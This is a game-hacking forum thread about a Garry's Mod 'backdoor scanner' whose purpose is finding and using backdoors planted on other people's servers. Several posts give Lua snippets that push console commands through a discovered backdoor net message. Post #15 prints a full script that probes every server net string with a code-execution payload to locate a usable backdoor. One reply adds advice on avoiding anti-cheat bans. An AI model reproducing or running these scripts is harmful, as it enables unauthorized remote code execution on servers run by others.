Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › MultiPlayer Game Hacks & Cheats › Steam Games Hacks & Cheats › Garry's Mod Hacks & Cheats › Simple backdoor scanner

PostSimple backdoor scanner

Posts 1–15 of 19 · Page 1 of 2
Lemosgg
Lemosgg
Simple backdoor scanner
backdoor scanner:
1.Download
2.Run script
if the backdoor is found, it will disconnect you from the server, and write to the console the name of the backdoor that you can use later.

example:
net.Start("Limon")
net.WriteString(" RunConsoleCommand('say','hack') ")
net.WriteBit(1)
net.SendToServer()
le_mpgh.net.rar
#1 · 7y ago
T-800
[MPGH]T-800
//Approved
#2 · 7y ago
JO
joeburglar
how to download
im stupid how xd?
#3 · 7y ago
XT
XtomatenX1234
How do use use the backdoor name
I don't know what I do with the name of the backdoor.
#4 · 7y ago
Sakimoto
Sakimoto
Quote Originally Posted by XtomatenX1234 View Post
I don't know what I do with the name of the backdoor.
You learned to read, haven't ya ? Try to understand the code and then modify it depending on your backdoor name.
#5 · 7y ago
XT
XtomatenX1234
Quote Originally Posted by Sakimoto View Post
You learned to read, haven't ya? Try to understand the code and then modify it depending on your backdoor name.
Yes, I can read. But I'm new to this and I don't get it. The only thing I have ever really used is spirit walk and IdiotBox. If someone would explain it to me I would be really thankful.
#6 · 7y ago
Sakimoto
Sakimoto
Quote Originally Posted by XtomatenX1234 View Post
Yes, I can read. But I'm new to this and I don't get it. The only thing I have ever really used is spirit walk and IdiotBox. If someone would explain it to me I would be really thankful.

Well, to put it simply...

You have to check in the console. The script will look for a backdoor through all the commands and addons available on the server.Once the backdoor is found, it will disconnect you from the server and you will have to find the backdoor's name in the console logs. Now, all you have to do is take the OP's script (for example) or a backdoor menu if you have one, and modify the backdoor's name with the one you just found.

Example : if the scanner disconnects me after testing something named like "pointshop", all you'll have to do is run a .lua with the following lines :

net.Start("pointshop")
net.WriteString(" RunConsoleCommand('say','hack') ")
net.WriteBit(1)
net.SendToServer()


Is it clearer now ?
#7 · edited 7y ago · 7y ago
XT
XtomatenX1234
Thanks
Quote Originally Posted by Sakimoto View Post
Well, to put it simply...

You have to check in the console. The script will look for a backdoor through all the commands and add-ons available on the server. Once the backdoor is found, it will disconnect you from the server and you will have to find the backdoor's name in the console logs. Now, all you have to do is take the OP's script (for example) or a backdoor menu if you have one, and modify the backdoor's name with the one you just found.

Example : if the scanner disconnects me after testing something named like "pointshop", all you'll have to do is run a .lua with the following lines :

net.Start("pointshop")
net.WriteString(" RunConsoleCommand('say','hack') ")
net.WriteBit(1)
net.SendToServer()


Is it clearer now?

Yes, thank you very much this was extremely helpful and I'm very thankful.
#8 · 7y ago
T3
t3r00t
Bad idea
Quote Originally Posted by Lemosgg View Post
backdoor scanner:
1.Download
2.Run script
if the backdoor is found, it will disconnect you from the server, and write to the console the name of the backdoor that you can use later.

example:
net.Start("Limon")
net.WriteString(" RunConsoleCommand('say','hack') ")
net.WriteBit(1)
net.SendToServer()
Do not use that because is SNTE Is installed you will get banned as soon as you net.sendtoserver use util.NetworkStringToID(str)
#9 · 7y ago
Vektast
Vektast
Quote Originally Posted by Sakimoto View Post
Well, to put it simply...

You have to check in the console. The script will look for a backdoor through all the commands and addons available on the server.Once the backdoor is found, it will disconnect you from the server and you will have to find the backdoor's name in the console logs. Now, all you have to do is take the OP's script (for example) or a backdoor menu if you have one, and modify the backdoor's name with the one you just found.

Example : if the scanner disconnects me after testing something named like "pointshop", all you'll have to do is run a .lua with the following lines :

net.Start("pointshop")
net.WriteString(" RunConsoleCommand('say','hack') ")
net.WriteBit(1)
net.SendToServer()


Is it clearer now ?
Finally I got it many thanks!
#10 · 7y ago
-Setro-
-Setro-
Quote Originally Posted by t3r00t View Post
Do not use that because is SNTE Is installed you will get banned as soon as you net.sendtoserver use util.NetworkStringToID(str)
It appears that the script uses that instead. The example is the only faulty thing here.
#11 · 7y ago
AP
apex00
Hmm does this work?
#12 · 7y ago
CH
chaosityj
cool stuff man
#13 · 7y ago
OldDiablo
OldDiablo
What is a backdoor?
#14 · 7y ago
AL
Alexmagno7
local cooldown = 1.1
local messagesStarted = false

local function ValidNetString(str)
return isstring(str) and util.NetworkStringToID(str) != 0 and str != ""
end


local timerCount = 0
for count = 0, 65536 do
local currentNetMSg = util.NetworkIDToString(count)
print(currentNetMSg)
if messagesStarted and not currentNetMSg then
print("Finished")
break
end
if currentNetMSg and currentNetMSg != "" then
messagesStarted = true
if not net.Receivers[currentNetMSg] then
if ValidNetString(currentNetMSg) then
timerCount = timerCount + cooldown
print(timerCount)
timer.Simple(timerCount, function()
print("Sent net message: "..currentNetMSg)
net.Start(currentNetMSg)
net.WriteString('util.AddNetworkString("foundwhatw elookinfor")')
net.WriteBit(1)
net.SendToServer()
if ValidNetString("foundwhatwelookinfor") then
print("Found backdoor: "..currentNetMSg)
RunConsoleCommand("disconnect")
else
print("Not backdoor")
end
print("---------------------------------------------")
end)
end
end
end
end
#15 · 7y ago
Posts 1–15 of 19 · Page 1 of 2

Post a Reply

Similar Threads

  • Simple Lua RCON BackdoorBy efeaydin in Garry's Mod Coding & Resources
    6Last post 7y ago
  • Simple Pattern ScannerBy Edlmann in Call of Duty Black Ops Coding, Programming & Source Code
    11Last post 15y ago
  • Have any one simple Memmory Scanner source?By 4n0nym0use in C++/C Programming
    4Last post 13y ago
  • Stop battleye detections/simple self-scannerBy Douggem in DayZ Mod & Standalone Hacks & Cheats
    20Last post 12y ago
  • Virus ScannerBy Elmo in Spammers Corner
    9Last post 16y ago

Tags for this Thread

None